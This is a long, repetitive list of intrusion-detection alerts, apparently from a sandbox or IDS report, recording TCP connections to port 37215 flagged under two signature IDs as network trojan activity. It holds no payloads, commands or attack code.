          Timestamp:06/09/24-16:33:13.720682
          SID:2835222
          Source Port:53122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540432
          SID:2829579
          Source Port:47128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.280575
          SID:2829579
          Source Port:58026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396894
          SID:2829579
          Source Port:36654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274272
          SID:2835222
          Source Port:39544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075385
          SID:2835222
          Source Port:53014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820837
          SID:2835222
          Source Port:49566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412455
          SID:2829579
          Source Port:54904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274521
          SID:2835222
          Source Port:43122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.991457
          SID:2835222
          Source Port:55556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645828
          SID:2829579
          Source Port:45620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867362
          SID:2829579
          Source Port:60184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.031487
          SID:2835222
          Source Port:39176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.067272
          SID:2835222
          Source Port:52726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033845
          SID:2835222
          Source Port:40318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.597435
          SID:2829579
          Source Port:53090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.569119
          SID:2835222
          Source Port:54500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.296749
          SID:2835222
          Source Port:54980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719222
          SID:2829579
          Source Port:43604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.130830
          SID:2835222
          Source Port:59132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.120939
          SID:2829579
          Source Port:41152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.564266
          SID:2829579
          Source Port:49630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168235
          SID:2829579
          Source Port:36844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226131
          SID:2829579
          Source Port:45514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.893095
          SID:2829579
          Source Port:44768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.010807
          SID:2835222
          Source Port:51396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.566163
          SID:2829579
          Source Port:33290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.559719
          SID:2835222
          Source Port:45058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.919211
          SID:2829579
          Source Port:43992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558976
          SID:2835222
          Source Port:50430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227049
          SID:2829579
          Source Port:48052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034745
          SID:2829579
          Source Port:44794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466873
          SID:2835222
          Source Port:49884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163218
          SID:2829579
          Source Port:56584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.602649
          SID:2829579
          Source Port:38218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274417
          SID:2829579
          Source Port:45908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.285148
          SID:2835222
          Source Port:35654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.000801
          SID:2835222
          Source Port:55152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224487
          SID:2835222
          Source Port:45004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.287884
          SID:2835222
          Source Port:33170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078123
          SID:2829579
          Source Port:40652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.036643
          SID:2835222
          Source Port:38792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.418296
          SID:2835222
          Source Port:40850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823140
          SID:2835222
          Source Port:53984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819176
          SID:2829579
          Source Port:45814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162446
          SID:2835222
          Source Port:56630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164661
          SID:2829579
          Source Port:50212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.467833
          SID:2835222
          Source Port:44334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.559740
          SID:2835222
          Source Port:43916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033525
          SID:2835222
          Source Port:56064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718699
          SID:2835222
          Source Port:51024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.924520
          SID:2835222
          Source Port:58906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.253051
          SID:2829579
          Source Port:47154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.243894
          SID:2829579
          Source Port:56820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399944
          SID:2835222
          Source Port:51840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.167044
          SID:2835222
          Source Port:56054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.298304
          SID:2829579
          Source Port:44454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718183
          SID:2835222
          Source Port:46736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078627
          SID:2835222
          Source Port:52196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.012578
          SID:2835222
          Source Port:52888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928951
          SID:2835222
          Source Port:52056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822421
          SID:2835222
          Source Port:59180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716341
          SID:2829579
          Source Port:34380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283200
          SID:2835222
          Source Port:43868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.093667
          SID:2835222
          Source Port:40136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.920982
          SID:2835222
          Source Port:60062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289846
          SID:2835222
          Source Port:51806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929604
          SID:2835222
          Source Port:54688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034877
          SID:2835222
          Source Port:33962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396933
          SID:2829579
          Source Port:58504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.678190
          SID:2835222
          Source Port:42972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.037890
          SID:2835222
          Source Port:55380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.471656
          SID:2829579
          Source Port:36736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719979
          SID:2829579
          Source Port:40394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166751
          SID:2835222
          Source Port:36546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718724
          SID:2835222
          Source Port:45558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.027317
          SID:2835222
          Source Port:40676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.471434
          SID:2835222
          Source Port:37470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.606884
          SID:2835222
          Source Port:48720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.300993
          SID:2829579
          Source Port:40364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102898
          SID:2829579
          Source Port:50964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923129
          SID:2829579
          Source Port:56748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947151
          SID:2829579
          Source Port:56774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.033104
          SID:2829579
          Source Port:42400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162790
          SID:2835222
          Source Port:40548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.952174
          SID:2835222
          Source Port:40664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162604
          SID:2835222
          Source Port:44326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988900
          SID:2835222
          Source Port:45242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230074
          SID:2829579
          Source Port:56006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.712904
          SID:2835222
          Source Port:39128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.289431
          SID:2835222
          Source Port:60580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931814
          SID:2835222
          Source Port:44220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.891002
          SID:2835222
          Source Port:40626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.989384
          SID:2829579
          Source Port:57116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558011
          SID:2835222
          Source Port:50820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.411772
          SID:2835222
          Source Port:47216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.273600
          SID:2829579
          Source Port:32894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.595875
          SID:2829579
          Source Port:39106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923700
          SID:2829579
          Source Port:57772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.043085
          SID:2835222
          Source Port:33836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.247448
          SID:2835222
          Source Port:43682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.943349
          SID:2835222
          Source Port:40184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414118
          SID:2835222
          Source Port:43798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.647001
          SID:2829579
          Source Port:35402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035054
          SID:2829579
          Source Port:50354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.908865
          SID:2835222
          Source Port:33990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.921896
          SID:2829579
          Source Port:36566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822582
          SID:2829579
          Source Port:35682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.289257
          SID:2829579
          Source Port:47092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035225
          SID:2835222
          Source Port:44338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166442
          SID:2835222
          Source Port:60272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719390
          SID:2835222
          Source Port:57674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823174
          SID:2829579
          Source Port:50306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.084054
          SID:2829579
          Source Port:57978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418153
          SID:2835222
          Source Port:59590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.723970
          SID:2835222
          Source Port:38740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.291413
          SID:2835222
          Source Port:60938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945631
          SID:2835222
          Source Port:36966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.077406
          SID:2829579
          Source Port:58696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.037730
          SID:2835222
          Source Port:33718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.556771
          SID:2829579
          Source Port:53010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166774
          SID:2835222
          Source Port:41992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.866118
          SID:2835222
          Source Port:47302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861038
          SID:2829579
          Source Port:36966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.164612
          SID:2835222
          Source Port:38036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.243964
          SID:2835222
          Source Port:41722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.601788
          SID:2829579
          Source Port:35864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.868980
          SID:2835222
          Source Port:39364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.074638
          SID:2829579
          Source Port:55688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.917020
          SID:2835222
          Source Port:41688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465000
          SID:2829579
          Source Port:42116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283694
          SID:2835222
          Source Port:56776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.097730
          SID:2829579
          Source Port:55242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.134238
          SID:2829579
          Source Port:42158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102264
          SID:2835222
          Source Port:43690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.161906
          SID:2829579
          Source Port:46810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.678085
          SID:2829579
          Source Port:53646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285690
          SID:2829579
          Source Port:32942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.868004
          SID:2829579
          Source Port:43168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.247336
          SID:2835222
          Source Port:50722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.074449
          SID:2829579
          Source Port:39214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.132956
          SID:2835222
          Source Port:52922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.916756
          SID:2829579
          Source Port:41154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.949044
          SID:2835222
          Source Port:33850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947936
          SID:2829579
          Source Port:54092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.014937
          SID:2835222
          Source Port:51134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.222822
          SID:2835222
          Source Port:44388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.862740
          SID:2829579
          Source Port:53144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643572
          SID:2829579
          Source Port:38730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713029
          SID:2835222
          Source Port:47966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.000454
          SID:2835222
          Source Port:59520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160262
          SID:2835222
          Source Port:40478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.292201
          SID:2835222
          Source Port:55272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719749
          SID:2835222
          Source Port:41338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.563182
          SID:2829579
          Source Port:47384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.161501
          SID:2835222
          Source Port:47818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923676
          SID:2835222
          Source Port:59792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.012636
          SID:2829579
          Source Port:50806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397536
          SID:2829579
          Source Port:58448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944279
          SID:2829579
          Source Port:52564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274182
          SID:2829579
          Source Port:54022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.272127
          SID:2829579
          Source Port:46388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.905489
          SID:2829579
          Source Port:48108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224663
          SID:2835222
          Source Port:34564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038758
          SID:2829579
          Source Port:58302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417446
          SID:2835222
          Source Port:47794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.925268
          SID:2835222
          Source Port:38306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598092
          SID:2835222
          Source Port:52152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.602517
          SID:2829579
          Source Port:34776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.989518
          SID:2835222
          Source Port:33026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.101000
          SID:2829579
          Source Port:34198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.031756
          SID:2829579
          Source Port:36806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035694
          SID:2829579
          Source Port:42012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.566014
          SID:2829579
          Source Port:50644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821108
          SID:2835222
          Source Port:46270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.660065
          SID:2829579
          Source Port:41872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869939
          SID:2829579
          Source Port:34478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162275
          SID:2829579
          Source Port:42330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929052
          SID:2835222
          Source Port:60418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.717788
          SID:2829579
          Source Port:55912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946844
          SID:2829579
          Source Port:49588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478075
          SID:2835222
          Source Port:33022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.099680
          SID:2829579
          Source Port:58372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718966
          SID:2835222
          Source Port:41584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286738
          SID:2829579
          Source Port:41846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166100
          SID:2829579
          Source Port:58056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867938
          SID:2835222
          Source Port:54318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.299752
          SID:2835222
          Source Port:34846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558805
          SID:2835222
          Source Port:35454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.287042
          SID:2829579
          Source Port:40234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.272668
          SID:2835222
          Source Port:56926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.285583
          SID:2835222
          Source Port:34508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033207
          SID:2835222
          Source Port:35680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557162
          SID:2835222
          Source Port:42294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205527
          SID:2835222
          Source Port:36150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028401
          SID:2835222
          Source Port:47754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538414
          SID:2829579
          Source Port:45832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.245050
